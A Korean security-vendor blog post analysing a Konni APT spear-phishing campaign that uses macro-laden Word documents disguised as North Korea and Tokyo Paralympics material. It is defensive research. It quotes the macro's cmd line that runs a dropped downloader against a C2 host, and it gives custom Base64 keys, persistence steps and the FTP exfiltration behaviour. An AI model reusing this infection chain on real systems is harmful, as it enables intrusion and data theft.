'북한 중앙위원회 전원회의', '2020년 동경 패럴림픽' 관련 문서로 위장한 코니(Konni) APT 그룹 공격 포착

안녕하세요.

이스트시큐리티 ESRC 입니다. 

'북한 중앙위원회 전원회의', '2020년 동경 패럴림픽' 관련 문서로 위장한 코니(Konni) APT 그룹  스피어피싱 공격이 포착되었습니다. 

* 코니(Konni) APT 조직

2014년도부터 지금까지 꾸준히 활동을 하고있는 APT 조직으로, 스피어피싱 공격방식을 사용하며, 주로 북한과 관련된 내용이나 현재 사회적으로 화두가 되고 있는 이슈들로 사용자들의 클릭을 유도합니다. 

2019년 6월, 이스트시큐리티는 코니(Konni)조직을 추적하는 과정 중 김수키(Kimsuky)조직과 관련된 몇가지 의심스러운 정황들을 포착하였으며, 코니와 김수키 조직이 특별한 관계에 있을 것이라고 추측중에 있습니다. 

이번에 발견된 2개의 악성문서는 각각 1월 14일과 15일에 제작된 것으로 확인되었으며, 문서의 최종 저장자는  “Georgy Toloraya”로 지정되어 있으며, 내부 코드 페이지가 한국어 기반으로 제작된 특징을 갖고 있습니다. 

● 러시아어로 작성된 북한 관련 문서(faf6492129eeca2633a68c9b8c2b8156)

사용자가 해당 문서를 실행하면, 텍스트 색깔이 연한 회색으로 설정되어 있는 본문과 함께 액티브 콘텐츠 차단 보안 경고창이 나타납니다. 사용자가 본문의 텍스트 색깔조절을 위하여 [콘텐츠 사용] 버튼을 클릭하면 해당 문서에 포함된 악성 매크로가 실행됩니다. 

본문은 러시아어로 작성되어 있으며, 번역기 실행 결과 '북한 중앙위원회 전원회의'와 관련된 내용이었습니다. 

[그림1] 악성매크로가 포함된 문서파일

● 도쿄 패럴림픽 관련 문서(40e7a1f37950277b115d5944b53eaf3c)

해당 문서파일은 2020 도쿄 패럴림픽에 기부한 'Kinzler' 재단에 대한 설명을 담고 있습니다. 

[그림2] Kinzler 재단에 대한 내용

위 두 악성파일들은 모두 한국어 인코딩 표준(Code Page - 949)으로 작성이 되었고, 최종 작성자가 ‘Georgy Toloraya’로 동일합니다. 

러시아어로 작성된 북한 관련 문서 *faf6492129eeca2633a68c9b8c2b8156)	도쿄 패럴림픽 관련 문서  (40e7a1f37950277b115d5944b53eaf3c)

[표1] 두 악성파일 비교표

악성코드 분석

두 파일에 공통적으로 포함된 매크로의 기능은 다음과 같습니다. (러시아어로 된 북한 관련 문서 기준으로 분석)

- 문서 글꼴 색 변경

다음은 문서 글꼴 색을 변경하는 코드로, 사용자가 만약 [콘텐츠 사용] 버튼을 눌러 매크로를 활성시킬 경우 글꼴 색이 옅은 회색에서 검은색으로 변경됩니다. 

[그림3] 문서 글꼴 색 변경 코드

- 'df.txt' 파일 드롭 및 cmd 명령어 실행

악성매크로는 실행 후 df.txt 파일을 드롭하고, cmd 명령어를 실행합니다. 

[그림4]  df.txt 드롭 및 cmd 명령어 실행 코드

매크로에서 실행되는 cmd 명령어는 드롭된 df.txt를 gb.exe로 이름 변경 및 ‘hxxp://firefox-plug.c1.biz’를 인자로 실행하는 기능을 수행합니다. 

cmd /c cd/d C:\Users\[사용자 계정]\AppData\Local\Microsoft&&ren df.txt gb.exe&&gb http://hxxp://firefox-plug.c1.biz

- gb.exe

C&C에서 64비트인 경우 3.dat, 64비트인 경우 2.dat를 다운로드 받습니다. 다운로드된 파일은 현재 실행 중인 프로세스 경로에 ‘temp.dat’ 파일 이름으로 드롭됩니다. 

[그림 5] OS 비트별 악성코드 다운로드 코드

드롭된 ‘temp.dat’는 인코딩된 CAB 파일이며, Custom Base64로 디코딩한 이후 cmd 명령어에 의해 임시폴더(%TEMP%)에 압축해제됩니다.

[그림 6] cmd 명령어를 통해 임시폴더에 압축해제하는 화면

다음은 악성코드에서 디코딩할 때 사용된 Custom Base64 코드이며, 해당 로직은 이후 페이로드에서도 동일하게 사용됩니다.

[그림 7] Custom Base64 코드

아래는 Custom Base64 Key 입니다. 

I%d=uKpDTMeQ9F7a-OfXSocAYvihjlk4yB8LUVJ5nGqrN16tHRxsCwPbgzZE32W0m

압축해제되는 파일명 및 기능은 다음과 같습니다. 

파일명	기능
install.bat	1) 드롭된 xclientsvvc.dll 및 xclientsvc.ini 파일을 ‘%windir%\System32’ 경로에 복사  2) COMSysApp(COM+ System Application) 서비스에 복사한 xclientsvvc.dll 등록 및 실행
xclientsvc.dll	1) FTP 계정 정보가 담긴 파일(4.dat) 다운로드 및 파싱  2) FTP로 systeminfo, tasklist 명령어 결과 업로드
xclientsvc.ini	인코딩된 추가 다운로드 주소

압축해제 후에는 install.bat를 실행합니다.

- install.bat

gb.exe에서 실행되는 ‘install.bat’는  xclientsvvc.dll 및 xclientsvc.ini 파일을 ‘%windir%\System32’ 경로에 복사, ‘COM+ System Application’ 서비스에 ‘xclientsvvc.dll’ 등록 및 실행합니다.

[그림 8] install.bat 코드

- xclientsvc.dll

COM+ System Application 서비스에서 실행되는 ‘xclientsvc.dll’는 아래의 기능을 수행합니다.

1) FTP 계정 정보 다운로드

‘xclientsvc.ini’에 저장된 다운로드 주소 문자열을 디코딩하여 실행되는 경로에 ‘xclientsvc.dat’로 다운로드 합니다. ‘xclientsvc.dat’에는 인코딩된 FTP 도메인, 아이디, 비밀번호가 저장되어 있습니다.

[그림9] FTP 계정 정보가 저장된 4.dat 다운로드 코드

2) 정보전송

공격자의 FTP 서버의 ‘htdocs’ 폴더에 인코딩된 컴퓨터 이름의 폴더를 생성합니다. 이후 폴더에 systeminfo, tasklist 명령어 결과값을 ‘ff 월-일 시-분-초.txt’로 업로드 합니다. 

[그림10] FTP서버에 결과값 업로드

3) 추가 정보 탈취

정보 전송 이후, 감염PC로부터 추가 정보를 탈취하기 위해 C&C로부터 명령값을 받습니다. 만약 C&C에서 받아온 데이터 앞 1바이트가 ‘#’이 있는 경우, CAB 파일 압축 해제 및 내부의 실행파일을 실행한 결과를 파일로 저장해서 서버에 업로드하며, ‘#’이 없는 경우, cmd /c로 시작되는 명령어를 실행 및 결과를 파일로 저장해서 서버로 업로드합니다.

[그림11] 추가 명령 코드 일부

공격자가 접속한 FTP 중, ftpupload.net 주소도 포함되어 있는데, ftpupload.net주소는 "코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장"공격에서도 사용된 적이 있습니다. 

과거 Konni 공격과의 유사성 분석

1) 페이로드 설치 과정의 유사성

과거 Konni에서 사용된 악성코드는 ‘매크로’에서 urlcache를 통해 C&C로부터 Base64로 된 ‘1.txt’를 ‘1.bat’ 파일 이름으로 다운로드 및 디코딩하여 실행하는 방식이었습니다. 디코딩되어 실행되는 ‘1.bat’는 추가적으로 C&C에서 OS 비트에 따라서  페이로드를 다운받습니다.

하지만 이번 악성코드에서는 문서 매크로에 1.txt와 거의 동일한 기능을 수행하는 PE(df.txt)가 하드코딩되어 드롭 및 ‘gb.exe’로 이름 변경되어 실행됩니다. 따라서 설치 과정에서 유사성이 확인됩니다.

과거 Konni (2019.08.20)	이번 Konni (2020.01.16)

[표2] 과거 konni와 이번 konni의 페이로드 설치 과정의 유사성 비교

2) Custom Base64 Code

기존에 Konni로 알려진 악성코드와 이번 악성코드 모두 Custom Base64 Code를 사용합니다.

mshlpsrvc.dll (0AC5E88E6C9F11D3C5201578AAD0E9D8) (handicap.eu5.org) (2019.07.12 09:09:52 UTC)	compvgk.dll (46F3540F9A850D3114261E9F1C88100D) (clean.1apps.com) (2019.01.21 03:01:58 UTC)
qaR4sOz2bJ8fxZMFwUK%l7rLIQpucWk90ED= hdGy31nXt5CiYATVojeB6gNH-PvSm	HnhD1C2Zo5r4le7LSqck38ROw0NPpF= G6xjBUyuIVXMz-TE/QmAvK9YdftJigasWb

xclientsvc.dll (9DECFCA230031A04A7BB472D0EF16CC7) (panda2019.eu5.org) (2019.09.05 07:05:43 UTC)	xclientsvc.dll (CC695F1E4ED869222792ED2D7D923B42) (firefox-plug.c1.biz) (2020.01.16 07:39:49 UTC)
TYXpzsuDoFSMmd70k%BGKHQb6Z5ygVcRiP8 AO4aWhlf2t1-ExvqrwUj93CL=JNIne	I%d=uKpDTMeQ9F7a-OfXSocAYvihjlk4yB8LU VJ5nGqrN16tHRxsCwPbgzZE32W0m

 [표3]  konni에서 사용되는 Custom Base64 코드 비교

결론

이번에 발견된 공격의 경우, 사용자가 악성코드에 감염되면 공격자가 임의로 지정한 FTP서버로 시스템의 주요 정보를 업로드하고, 공격자의 추가 의도 및 명령에 따라 원격제어가 가능한 RAT 추가 감염 등 2차 피해로 이어질 수 있습니다. 

이때 공격자는 보안 탐지와 분석 등을 회피하기 위해 커스텀 Base64 코드 방식을 적용했는데 이는 작년 9월 "코니(Konni) APT 그룹, 러시아-북한-한국 무역, 경제관계 투자문서로 공격 수행"에서 사용한 기업과 정확히 일치합니다.

2020년 새해 들어 코니 조직의 활동이 새롭게 포착된 만큼, ESRC에서는 집중 모니터링을 강화하고 변종에 대한 대응을 철저히 진행하고 있습니다. 

현재 알약에서는 해당 악성 DOC 문서들에 대해 “Trojan.Downloader.W97M.Gen” 로 탐지중에 있으며, 관련 IoC 정보는 쓰렛 인사이드(Threat Inside)에서 확인하실 수 있습니다. 

※ 관련글 바로가기

▶ 코니(Konni) 조직, 병원관련 소송 답변 문서로 위장한 APT 공격 수행 (2019.12.12)

▶ 코니(Konni) APT 조직, HWP 취약점을 이용한 'Coin Plan' 작전 감행 (2019. 10. 01)

▶ 코니(Konni) APT 그룹, 러시아-북한-한국 무역, 경제관계 투자문서로 공격 수행 (2019. 09. 27)

▶ 코니(Konni) APT 조직, 모바일 스파이 활동을 통한 스마트 위협 증가 (2019. 08. 24)

▶ 코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장 (2019. 08. 19)

▶ [스페셜 리포트] APT 캠페인 'Konni' & 'Kimsuky' 조직의 공통점 발견 (2019. 06. 10)

▶ 한국어 구사 Konni 조직, 블루 스카이 작전 'Amadey' 러시아 봇넷 활용 (2019. 05. 16)

▶ 암호화폐 내용의 Konni APT 캠페인과 '오퍼레이션 헌터 아도니스' (2019. 01. 02)

▶ 새로운 KONNI 캠페인 등장, '작전명 해피 바이러스' (2018. 10. 18)